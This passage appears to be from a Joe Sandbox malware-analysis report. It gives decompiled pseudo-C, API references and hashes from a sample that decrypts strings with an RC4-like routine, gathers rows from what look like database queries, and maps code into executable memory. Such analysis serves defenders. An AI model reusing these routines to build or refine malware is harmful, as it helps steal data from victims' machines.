								E004016EF(_v156);
								E0040EAEF(E0040EB6B( &_v16, _t303,  &_v252, _t372, "\n"), _t303,  &_v16);
								E004016EF(_v252);
								E0040EAEF(E0040EB6B( &_v16, _t303,  &_v180, _t372,  *0x6131e0), _t303,  &_v16);
								E004016EF(_v180);
								E0040EAEF(E0040EB29( &_v16, _t303,  &_v72,  &_v228, _t372), _t303,  &_v16);
								E004016EF(_v228);
								E0040EAEF(E0040EB6B( &_v16, _t303,  &_v132, _t372, _t291), _t303,  &_v16);
								E004016EF(_v132);
								E0040EAEF(E0040EB6B( &_v16, _t303,  &_v144, _t372,  *0x613168), _t303,  &_v16);
								E004016EF(_v144);
								E0040EA50( &_v32, _t372, 0x40fbe1);
								_t240 =  *0x6135a4(_v20, 3, _a40, _a44);
								_t244 = E00404DEB(_t240,  &_v192,  *0x6135ac(), _v20, 3);
								_t363 = _t363 + 0x20;
								E0040EAEF(E0040EB29( &_v32, _t303, _t244,  &_v168, _t372), _t303,  &_v32);
								E004016EF(_v168);
								E004016EF(_v192);
								E0040EAEF(E0040EB29( &_v16, _t303,  &_v32,  &_v216, _t372), _t303,  &_v16);
								E004016EF(_v216);
								E0040EAEF(E0040EB6B( &_v16, _t303,  &_v240, _t372, _t291), _t303,  &_v16);
								E004016EF(_v240);
								E0040EAEF(E0040EB6B( &_v16, _t303,  &_v108, _t372, _t291), _t303,  &_v16);
								E004016EF(_v108);
								E004016EF(_v32);
								_v32 = _v32 & 0x00000000;
								_v24 = _v24 & 0x00000000;
								E004016EF(0);
								E004016EF(_v72);
								E004016EF(_v84);
								E004016EF(_v60);
								_t277 =  *0x613598(_v20);
								_pop(_t297);
							} while (_t277 == 0x64);
						}
						_t170 =  *0x61367c(_v16);
						_t374 = _t170 - 5;
						if(_t170 > 5) {
							_push( *0x61367c(_v16));
							_push(_v16);
							_t364 = _t363 - 0xc;
							E0040EA82( &_v48, _t297, _t363 - 0xc, _t374);
							E00401581( &_a52, _t364 - 0x50);
							_push( &_v108);
							E00403721(_t297, _t374);
							E004016EF(_v108);
						}
						E004016EF(_v16);
						E004016EF(0);
					}
					 *0x61359c(_v20);
					 *0x6135c4(_v36); // executed
				}
				E004016EF(_v48);
				E004016EF(0);
				E004016EF(_a4);
				E004016EF(_a16);
				E004016EF(_a28);
				return E00401562( &_a52);
			}

0x00405d77
0x00405d89
0x00405d8c
0x00405d91
0x00405d95
0x00405d9b
0x00405d9d
0x00405e3b
0x00405e43
0x00405e4b
0x00405e53
0x00405e5b
0x00405e63
0x00405e68
0x00405d9f
0x00405dd0
0x00405dd8
0x00405de0
0x00405de8
0x00405ded
0x00405ded
0x00405e6b
0x00405e77
0x00405e81
0x00405e97
0x00405e9d
0x00405ea0
0x00405ea2
0x00405eac
0x00405eb4
0x00405eba
0x00405ebb
0x00405ebe
0x00405ec4
0x00405ec9
0x00405eda
0x00405ef0
0x00405efa
0x00405f01
0x00405f06
0x00405f1f
0x00405f27
0x00405f40
0x00405f4b
0x00405f51
0x00405f62
0x00405f67
0x00405f6d
0x00405f86
0x00405f8e
0x00405fa7
0x00405fb2
0x00405fc9
0x00405fd4
0x00405ff0
0x00405ffb
0x00406014
0x0040601f
0x00406033
0x0040603b
0x00406057
0x00406062
0x0040606f
0x0040607f
0x0040609f
0x004060a6
0x004060ba
0x004060c5
0x004060d0
0x004060e8
0x004060f3
0x0040610a
0x00406115
0x00406129
0x00406131
0x00406139
0x0040613e
0x00406142
0x00406148
0x00406150
0x00406158
0x00406160
0x00406168
0x0040616e
0x0040616f
0x00405ec9
0x0040617b
0x00406181
0x00406184
0x0040618f
0x00406190
0x00406196
0x0040619b
0x004061a8
0x004061b0
0x004061b1
0x004061bc
0x004061bc
0x004061c4
0x004061cb
0x004061cb
0x004061d3
0x004061dd
0x004061e3
0x004061e7
0x004061ee
0x004061f6
0x004061fe
0x00406206
0x00406217

APIs

Part of subcall function 0040EA50: lstrcpy.KERNEL32(00000000,00000000), ref: 0040EA76

Part of subcall function 0040EB6B: lstrlen.KERNEL32(?,?,?,0040D07A,00412124,00000000,00412124,00000000,0040FBE1), ref: 0040EB7F
Part of subcall function 0040EB6B: lstrcpy.KERNEL32(00000000,?), ref: 0040EBA7
Part of subcall function 0040EB6B: lstrcat.KERNEL32(?,00000000), ref: 0040EBB2

Part of subcall function 0040EB29: lstrcpy.KERNEL32(00000000,?), ref: 0040EB57
Part of subcall function 0040EB29: lstrcat.KERNEL32(?,00000000), ref: 0040EB61

Part of subcall function 0040EAEF: lstrcpy.KERNEL32(00000000,?), ref: 0040EB1F

Part of subcall function 00404DEB: memcmp.MSVCRT ref: 00404E09
Part of subcall function 00404DEB: memset.MSVCRT ref: 00404E3B
Part of subcall function 00404DEB: LocalAlloc.KERNEL32(00000040,-000000E1), ref: 00404E71

lstrlen.KERNEL32(?), ref: 0040617B
lstrlen.KERNEL32(?), ref: 00406189

Strings

!A, xrefs: 00405F51, 00405F67

Memory Dump Source

Source File: 00000000.00000002.351171685.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.351171685.000000000041B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.0000000000427000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.00000000004E3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.00000000005B4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.0000000000613000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.0000000000625000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_B7VbZC8QLf.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$lstrcat$AllocLocalmemcmpmemset
String ID: !A
API String ID: 4023347672-1246296855
Opcode ID: 6d1489e5c052444228bc0054c3c160c76ced36c59162f8c65c49fa02d2516589
Instruction ID: 2cef14578bfc6af4a4f0c4ae01e9d538aa3dec0c8af2c5f76aa12168dcbfb125
Opcode Fuzzy Hash: 6d1489e5c052444228bc0054c3c160c76ced36c59162f8c65c49fa02d2516589
Instruction Fuzzy Hash: CAD19831D001299BCF00FBA6DC829CDB7B6AF04308F5549BAF515B71A2DB397E568B48

Uniqueness

Uniqueness Score: -1.00%

Function 00402E85 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 111
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00402E85(char _a4, char _a8) {
				void* _v8;
				intOrPtr _v12;
				char _v16;
				void* _v20;
				intOrPtr* _t55;
				void* _t56;
				void* _t58;
				intOrPtr* _t59;
				signed int _t62;
				signed int* _t63;
				signed int _t70;
				signed int _t78;
				intOrPtr* _t81;
				char _t86;
				intOrPtr _t87;
				signed char _t88;
				signed int _t92;
				void* _t93;
				intOrPtr* _t94;
				intOrPtr* _t95;
				intOrPtr _t97;
				signed int _t99;
				signed int _t103;
				intOrPtr _t104;
				signed int _t105;
				void* _t109;

				_t97 =  *0x61327c; // 0x40fbf8
				_t70 = 0;
				_t103 = 0;
				_t78 = E0040D7F2(_t97);
				do {
					_t92 = _t103 % _t78;
					 *(_t109 + _t103 * 4 - 0x410) = _t103;
					_t103 = _t103 + 1;
					 *(_t109 + _t103 * 4 - 0x814) =  *(_t92 + _t97) & 0x000000ff;
				} while (_t103 < 0x100);
				_t93 = 0;
				do {
					_t55 = _t109 + _t93 - 0x410;
					_t104 =  *_t55;
					_t70 = _t70 +  *((intOrPtr*)(_t109 + _t93 - 0x810)) + _t104 & 0x800000ff;
					if(_t70 < 0) {
						_t70 = (_t70 - 0x00000001 | 0xffffff00) + 1;
					}
					_t81 = _t109 + _t70 * 4 - 0x410;
					_t93 = _t93 + 4;
					 *_t55 =  *_t81;
					 *_t81 = _t104;
				} while (_t93 < 0x400);
				_t56 = E0040D7F2(_a4);
				_t20 = _t56 + 1; // 0x1
				_t58 = malloc(_t20); // executed
				_t105 = 0;
				_t99 = 0;
				_v20 = _t58;
				_v12 = 0;
				if(_t56 > 0) {
					_t86 = _a4;
					_v8 = _t58;
					_v8 = _v8 - _t86;
					_v16 = _t86;
					do {
						_t105 = _t105 + 0x00000001 & 0x800000ff;
						if(_t105 < 0) {
							_t105 = (_t105 - 0x00000001 | 0xffffff00) + 1;
						}
						_t59 = _t109 + _t105 * 4 - 0x410;
						_t87 =  *_t59;
						_t99 = _t99 + _t87 & 0x800000ff;
						if(_t99 < 0) {
							_t99 = (_t99 - 0x00000001 | 0xffffff00) + 1;
						}
						_t94 = _t109 + _t99 * 4 - 0x410;
						 *_t59 =  *_t94;
						 *_t94 = _t87;
						_t62 =  *_t59 + _t87 & 0x800000ff;
						if(_t62 < 0) {
							_t62 = (_t62 - 0x00000001 | 0xffffff00) + 1;
						}
						_t34 =  &_v16; // 0x403060
						_t95 =  *_t34;
						_t88 =  *_t95;
						_t63 = _t109 + _t62 * 4 - 0x410;
						if( *_t63 != (_t88 & 0x000000ff)) {
							 *(_v8 + _t95) =  *_t63 ^ _t88;
						} else {
							 *(_v8 + _t95) = _t88;
						}
						_v12 = _v12 + 1;
						_v16 = _t95 + 1;
					} while (_v12 < E0040D7F2(_a4));
					_t58 = _v20;
				}
				 *((char*)(_t58 + _v12)) = 0;
				_t50 =  &_a8; // 0x403060
				 *( *_t50) = _t58;
				return _t58;
			}

0x00402e91
0x00402e99
0x00402e9b
0x00402ea2
0x00402ea4
0x00402ea8
0x00402eaa
0x00402eb1
0x00402eb6
0x00402ebd
0x00402ec5
0x00402ec7
0x00402ece
0x00402ed5
0x00402edb
0x00402ee1
0x00402eea
0x00402eea
0x00402eeb
0x00402ef4
0x00402ef7
0x00402ef9
0x00402efb
0x00402f06
0x00402f0d
0x00402f11
0x00402f17
0x00402f19
0x00402f1c
0x00402f1f
0x00402f24
0x00402f2a
0x00402f2d
0x00402f30
0x00402f33
0x00402f36
0x00402f37
0x00402f3d
0x00402f46
0x00402f46
0x00402f47
0x00402f4e
0x00402f52
0x00402f58
0x00402f61
0x00402f61
0x00402f62
0x00402f6b
0x00402f6d
0x00402f73
0x00402f78
0x00402f80
0x00402f80
0x00402f81
0x00402f81
0x00402f84
0x00402f89
0x00402f92
0x00402fa3
0x00402f94
0x00402f97
0x00402f97
0x00402fa6
0x00402fad
0x00402fb5
0x00402fbe
0x00402fbe
0x00402fc5
0x00402fc9
0x00402fcd
0x00402fd1

APIs

malloc.MSVCRT ref: 00402F11

Strings

`0@, xrefs: 00402FC9
`0@, xrefs: 00402F81

Memory Dump Source

Source File: 00000000.00000002.351171685.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.351171685.000000000041B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.0000000000427000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.00000000004E3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.00000000005B4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.0000000000613000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.0000000000625000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_B7VbZC8QLf.jbxd

Yara matches

Similarity

API ID: malloc
String ID: `0@$`0@
API String ID: 2803490479-2219722837
Opcode ID: 1e123fb37cc99bd9fc5abcf1208d45de95ddb8bce801801678e531d8d919b61b
Instruction ID: c90c13f129f47f136f014b0b35f92830890b74303263e5c397bf8e73ca01d2a3
Opcode Fuzzy Hash: 1e123fb37cc99bd9fc5abcf1208d45de95ddb8bce801801678e531d8d919b61b
Instruction Fuzzy Hash: D0413871A0022A9FCB14CFA8D8806E8B7B1FF89318F1485BAD855E73D1C7786942DF94

Uniqueness

Uniqueness Score: -1.00%

Function 0040A727 Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 89
stringCOMMON

Download Yara Rule

C-Code - Quality: 53%

			E0040A727(char* _a4, char* _a8) {
				void* _v8;
				void* _v12;
				char _v276;
				char _v596;
				char _v860;
				short _v1380;
				void* _t25;
				intOrPtr* _t27;
				intOrPtr* _t31;
				intOrPtr* _t33;
				intOrPtr* _t35;
				void* _t36;
				intOrPtr* _t37;
				void* _t51;

				 *_a8 = 0;
				_v8 = 0;
				_t25 =  *0x613648(0x40f038, 0, 1, 0x40f028,  &_v8); // executed
				_t51 = _t25;
				if(_t51 < 0) {
					L6:
					return _t51;
				}
				_t27 = _v8;
				_v12 = 0;
				 *((intOrPtr*)( *_t27))(_t27, 0x40f048,  &_v12);
				MultiByteToWideChar(0, 0, _a4, 0xffffffff,  &_v1380, 0x104);
				_t31 = _v12;
				_t51 =  *((intOrPtr*)( *_t31 + 0x14))(_t31,  &_v1380, 0);
				if(_t51 < 0) {
					goto L6;
				}
				_t33 = _v8;
				_t51 =  *((intOrPtr*)( *_t33 + 0x4c))(_t33, 0, 1);
				if(_t51 < 0) {
					goto L6;
				}
				_t35 = _v8;
				_t36 =  *((intOrPtr*)( *_t35 + 0xc))(_t35,  &_v276, 0x104,  &_v596, 4);
				if(_t36 >= 0) {
					_t37 = _v8;
					_t36 =  *((intOrPtr*)( *_t37 + 0x18))(_t37,  &_v860, 0x104);
					_t51 = _t36;
					if(_t51 >= 0) {
						 *0x6136f0(_a8,  &_v276, 0x104);
						goto L6;
					}
				}
				return _t36;
			}

0x0040a738
0x0040a74b
0x0040a74e
0x0040a754
0x0040a758
0x0040a7fb
0x00000000
0x0040a7fb
0x0040a75e
0x0040a76a
0x0040a770
0x0040a786
0x0040a78c
0x0040a79d
0x0040a7a1
0x00000000
0x00000000
0x0040a7a3
0x0040a7af
0x0040a7b3
0x00000000
0x00000000
0x0040a7b5
0x0040a7cc
0x0040a7d1
0x0040a7d3
0x0040a7e1
0x0040a7e4
0x0040a7e8
0x0040a7f5
0x00000000
0x0040a7f5
0x0040a7e8
0x0040a801

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104), ref: 0040A786
lstrcpyn.KERNEL32(0040A926,?,00000104), ref: 0040A7F5

Strings

%s\%s, xrefs: 0040A734

Memory Dump Source

Source File: 00000000.00000002.351171685.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.351171685.000000000041B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.0000000000427000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.00000000004E3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.00000000005B4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.0000000000613000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.0000000000625000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_B7VbZC8QLf.jbxd

Yara matches

Similarity

API ID: ByteCharMultiWidelstrcpyn
String ID: %s\%s
API String ID: 784140127-4073750446
Opcode ID: 38901419e64e6532b95ce892d61a58eeba5ce1ce6a5feeebf24be374f9f2c67c
Instruction ID: d1bd0a218a5a85cf24e2f4ff01bbf1970b27f7e45296172458e577e4065f7c63
Opcode Fuzzy Hash: 38901419e64e6532b95ce892d61a58eeba5ce1ce6a5feeebf24be374f9f2c67c
Instruction Fuzzy Hash: 74312DB5600218BFDB00DF94CCC4DAA77BDEBC9715F1484A9F602EB290D6759E458B60

Uniqueness

Uniqueness Score: -1.00%

Function 0040445C Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 63
memoryCOMMON

Download Yara Rule

C-Code - Quality: 96%

			E0040445C(void* __ecx, void* __esi) {
				char _v8;
				intOrPtr _t22;
				void* _t25;
				void* _t29;
				void* _t30;
				intOrPtr _t32;
				intOrPtr _t33;
				char _t35;
				long _t36;
				intOrPtr* _t41;
				intOrPtr _t42;
				signed int _t46;
				void* _t47;

				_t47 = __esi;
				_t22 =  *((intOrPtr*)(__esi + 0x138));
				_t35 = 0;
				_v8 = 0;
				if(0 >=  *(__esi + 0x46)) {
					L8:
					_t10 =  &_v8; // 0x6139e0
					_t36 = _t35 -  *_t10;
					_t11 =  &_v8; // 0x6139e0
					_t25 = VirtualAlloc( *((intOrPtr*)(_t47 + 0x74)) +  *_t11, _t36, 0x3000, 0x40); // executed
					 *(_t47 + 0x148) = _t25;
					 *((intOrPtr*)(_t47 + 0x144)) =  *((intOrPtr*)(_t47 + 0x74));
					if(_t25 != 0) {
						L12:
						asm("sbb eax, eax");
						_t29 = ( ~( *(_t47 + 0x148)) & 0xfffffffd) + 3;
						L13:
						return _t29;
					}
					if(( *(_t47 + 0x56) & 0x00000001) == 0) {
						_t30 = VirtualAlloc(0, _t36, 0x3000, 0x40);
						 *(_t47 + 0x148) = _t30;
						_t19 =  &_v8; // 0x6139e0
						 *((intOrPtr*)(_t47 + 0x144)) = _t30 -  *_t19;
						goto L12;
					}
					_t29 = 4;
					goto L13;
				}
				_t46 =  *(__esi + 0x46) & 0x0000ffff;
				_t41 = _t22 + 0xc;
				do {
					_t42 =  *((intOrPtr*)(_t41 - 4));
					if(_t42 != 0) {
						_t32 =  *_t41;
						_t7 =  &_v8; // 0x6139e0
						if(_t32 <  *_t7) {
							_v8 = _t32;
						}
						_t33 = _t32 + _t42;
						if(_t33 > _t35) {
							_t35 = _t33;
						}
					}
					_t41 = _t41 + 0x28;
					_t46 = _t46 - 1;
				} while (_t46 != 0);
				goto L8;
			}

0x0040445c
0x00404460
0x00404467
0x0040446c
0x00404473
0x0040449b
0x0040449e
0x0040449e
0x004044a1
0x004044ae
0x004044b7
0x004044bd
0x004044c5
0x004044ed
0x004044f5
0x004044fa
0x004044fd
0x00404500
0x00404500
0x004044cb
0x004044d8
0x004044de
0x004044e4
0x004044e7
0x00000000
0x004044e7
0x004044cf
0x00000000
0x004044cf
0x00404475
0x00404479
0x0040447c
0x0040447c
0x00404481
0x00404483
0x00404485
0x00404488
0x0040448a
0x0040448a
0x0040448d
0x00404491
0x00404493
0x00404493
0x00404491
0x00404495
0x00404498
0x00404498
0x00000000

APIs

VirtualAlloc.KERNEL32(9a,9a,00003000,00000040,00000000,?,?,?,00404855,?,006139E0), ref: 004044AE
VirtualAlloc.KERNEL32(00000000,9a,00003000,00000040,?,00404855,?,006139E0), ref: 004044D8

Strings

9a, xrefs: 0040449E, 004044A1, 004044E4, 00404485, 004044AC, 004044AD, 004044D5

Memory Dump Source

Source File: 00000000.00000002.351171685.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.351171685.000000000041B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.0000000000427000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.00000000004E3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.00000000005B4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.0000000000613000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.0000000000625000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_B7VbZC8QLf.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID: 9a
API String ID: 4275171209-3489679592
Opcode ID: 44c5160ae386a3c9a17d8242683d7231269653620c6848f35bfbf15c721a70c7
Instruction ID: b640e68774d4495d154c2015ec45d2662e92278b636ea60acac6f0bd6655f9b3
Opcode Fuzzy Hash: 44c5160ae386a3c9a17d8242683d7231269653620c6848f35bfbf15c721a70c7
Instruction Fuzzy Hash: 3F1181F2600705ABC724CFB4C985B9BB7F5EB84714F24482EE65AE73D0D674AD408618

Uniqueness

Uniqueness Score: -1.00%

Function 0040476F Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 63
memoryCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E0040476F(void* __ecx, void* __edi) {
				long _v8;
				intOrPtr _t17;
				signed int _t19;
				unsigned int _t22;
				int _t26;
				void* _t28;
				void* _t29;
				void* _t30;
				void* _t31;
				void* _t36;
				void* _t40;
				unsigned int* _t43;

				_t40 = __edi;
				_t17 =  *((intOrPtr*)(__edi + 0x138));
				_t36 = 0;
				if(0 >=  *((intOrPtr*)(__edi + 0x46))) {
					L17:
					goto L18;
				} else {
					_t43 = _t17 + 0x24;
					do {
						_t19 =  *_t43;
						if((_t19 & 0x00000020) != 0) {
							 *_t43 = _t19 | 0x60000000;
						}
						_t22 =  *_t43 >> 0x1d;
						if(_t22 == 0) {
							L14:
							_v8 = 2;
						} else {
							_t28 = _t22 - 1;
							if(_t28 == 0) {
								_v8 = 0x10;
								L15:
								_t26 = VirtualProtect( *((intOrPtr*)(_t43 - 0x18)) +  *((intOrPtr*)(_t40 + 0x144)),  *(_t43 - 0x1c), _v8,  &_v8); // executed
								if(_t26 == 0) {
									_push(9);
									_pop(0);
									L18:
									return 0;
								}
								goto L16;
							}
							_t29 = _t28 - 1;
							if(_t29 == 0) {
								goto L14;
							}
							_t30 = _t29 - 1;
							if(_t30 == 0) {
								_v8 = 0x20;
							} else {
								_t31 = _t30 - 1;
								if(_t31 == 0 || _t31 == 0) {
									_v8 = 4;
								} else {
									_v8 = 0x40;
								}
							}
						}
						goto L15;
						L16:
						_t36 = _t36 + 1;
						_t43 =  &(_t43[0xa]);
					} while (_t36 < ( *(_t40 + 0x46) & 0x0000ffff));
					goto L17;
				}
			}

0x0040476f
0x00404773
0x0040477c
0x00404783
0x00404804
0x00000000
0x00404785
0x00404785
0x00404788
0x00404788
0x0040478c
0x00404793
0x00404793
0x0040479a
0x0040479d
0x004047d3
0x004047d3
0x0040479f
0x0040479f
0x004047a0
0x004047ca
0x004047da
0x004047ee
0x004047f6
0x0040480a
0x0040480c
0x00404806
0x00404809
0x00404809
0x00000000
0x004047f6
0x004047a2
0x004047a3
0x00000000
0x00000000
0x004047a5
0x004047a6
0x004047c1
0x004047a8
0x004047a8
0x004047a9
0x004047b8
0x004047af
0x004047af
0x004047af
0x004047a9
0x004047a6
0x00000000
0x004047f8
0x004047fc
0x004047fd
0x00404800
0x00000000
0x00404788

APIs

VirtualProtect.KERNEL32(?,?,00000002,00000002,?,?,?,?,00404893), ref: 004047EE

Strings

, xrefs: 004047C1

Memory Dump Source

Source File: 00000000.00000002.351171685.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.351171685.000000000041B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.0000000000427000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.00000000004E3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.00000000005B4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.0000000000613000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.0000000000625000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_B7VbZC8QLf.jbxd

Yara matches

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-3916222277
Opcode ID: 07d054d335bc7c263c7fdeb695d2c2363d5d777a8d712bcf15fe259d17356b4d
Instruction ID: 2524954804c0eb3e5eb5ade342d398da1301f43698fd2b2dc0a08cce27bc3ff6
Opcode Fuzzy Hash: 07d054d335bc7c263c7fdeb695d2c2363d5d777a8d712bcf15fe259d17356b4d
Instruction Fuzzy Hash: F2118CB2520219AADB24DF94C5447AAB7F4FB45340F60842BD741F32C0C778EA96DB6A

Uniqueness

Uniqueness Score: -1.00%

Function 0040AAE3 Relevance: 3.1, APIs: 2, Instructions: 55stringCOMMON

Download Yara Rule

APIs

strtok_s.MSVCRT ref: 0040AAFE
strtok_s.MSVCRT ref: 0040AB4D

Memory Dump Source

Source File: 00000000.00000002.351171685.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.351171685.000000000041B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.0000000000427000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.00000000004E3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.00000000005B4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.0000000000613000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.0000000000625000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_B7VbZC8QLf.jbxd

Yara matches

Similarity

API ID: strtok_s
String ID:
API String ID: 3330995566-0
Opcode ID: 51e0daf863b889a62f39715806230d11b2170b6ef821ca30f94bc94a9137969b
Instruction ID: 96f9dcc4434dc3aa6c82edce91cb4631fffc4d2cdfc91e6f1799da6da688cc9c
Opcode Fuzzy Hash: 51e0daf863b889a62f39715806230d11b2170b6ef821ca30f94bc94a9137969b
Instruction Fuzzy Hash: 2E116672900208BBCF10EFA8CC42ADD7BB5AB08344F104036FA00B3290EB70AA259B95

Uniqueness

Uniqueness Score: -1.00%

Function 004058B3 Relevance: 2.7, APIs: 2, Instructions: 189
stringCOMMON

Download Yara Rule

C-Code - Quality: 59%

			E004058B3(void* __ecx, void* __eflags, intOrPtr _a4, char _a16, char _a28, char _a40, intOrPtr _a120) {
				char _v8;
				char _v12;
				char _v24;
				char _v36;
				char _v48;
				char _v60;
				char _v72;
				char _v84;
				char _v96;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t70;
				char _t88;
				void* _t91;
				void* _t104;
				void* _t108;
				void* _t109;
				void* _t121;
				void* _t134;
				void* _t160;
				void* _t165;
				void* _t167;
				void* _t169;
				intOrPtr* _t175;
				void* _t200;
				void* _t201;

				_t160 = __ecx;
				_t175 =  &_v36;
				E0040EA50(_t175, __eflags, 0x40fbe1);
				_t206 = _a120;
				_push( *0x613248);
				_t70 = _t175;
				if(_a120 == 0) {
					E0040EAEF(E0040EB6B(E0040EB29(E0040EB6B(E0040EB29(E0040EB6B(E0040EB6B(_t70, _t160,  &_v96, __eflags,  *0x6133f4), _t160,  &_v84, __eflags, 0x40fbe4), _t160,  &_a28,  &_v24, __eflags), _t160,  &_v48, __eflags, "_"), _t160,  &_a16,  &_v60, __eflags), _t160,  &_v72, __eflags), _t160,  &_v36);
					E004016EF(_v72);
					E004016EF(_v60);
					E004016EF(_v48);
					E004016EF(_v24);
					E004016EF(_v84);
					_t88 = _v96;
				} else {
					E0040EAEF(E0040EB6B(E0040EB29(E0040EB6B(E0040EB6B(_t70, _t160,  &_v72, _t206,  *0x6133f4), _t160,  &_v60, _t206, 0x40fbe4), _t160,  &_a28,  &_v24, _t206), _t160,  &_v48, _t206), _t160,  &_v36);
					E004016EF(_v48);
					E004016EF(_v24);
					E004016EF(_v60);
					_t88 = _v72;
				}
				E004016EF(_t88);
				_t91 =  *0x6135c0(_a4,  &_v12); // executed
				if(_t91 == 0) {
					_t104 =  *0x61357c(_v12,  *0x6134c8, 0xffffffff,  &_v8, _t91); // executed
					_t201 = _t200 + 0x14;
					_t208 = _t104;
					if(_t104 == 0) {
						E0040EA50( &_v24, _t208, 0x40fbe1);
						while(1) {
							_t108 =  *0x613598(_v8);
							_pop(_t165);
							if(_t108 != 0x64) {
								break;
							}
							_t109 =  *0x6135b4(_v8, 0);
							_pop(_t167);
							E0040EA50( &_v48, __eflags, _t109);
							E0040EAEF(E0040EB29( &_v24, _t167,  &_v48,  &_v96, __eflags), _t167,  &_v24);
							E004016EF(_v96);
							E0040EAEF(E0040EB6B( &_v24, _t167,  &_v84, __eflags, " "), _t167,  &_v24);
							E004016EF(_v84);
							_t121 =  *0x6135b4(_v8, 1);
							_pop(_t169);
							E0040EAEF(E0040EB6B( &_v24, _t169,  &_v72, __eflags, _t121), _t169,  &_v24);
							E004016EF(_v72);
							E0040EAEF(E0040EB6B( &_v24, _t169,  &_v60, __eflags, "\n"), _t169,  &_v24);
							E004016EF(_v60);
							E004016EF(_v48);
						}
						_t134 =  *0x61367c(_v24);
						_t210 = _t134 - 5;
						if(_t134 > 5) {
							_push( *0x61367c(_v24));
							_push(_v24);
							E0040EA82( &_v36, _t165, _t201 - 0xc, _t210);
							E00401581( &_a40, _t201 - 0xffffffffffffffbc);
							_push( &_v96);
							E00403721(_t165, _t210);
							E004016EF(_v96);
						}
						E004016EF(_v24);
						E004016EF(0);
					}
					 *0x61359c(_v8);
					 *0x6135c4(_v12); // executed
				}
				E004016EF(_v36);
				E004016EF(0);
				E004016EF(_a4);
				E004016EF(_a16);
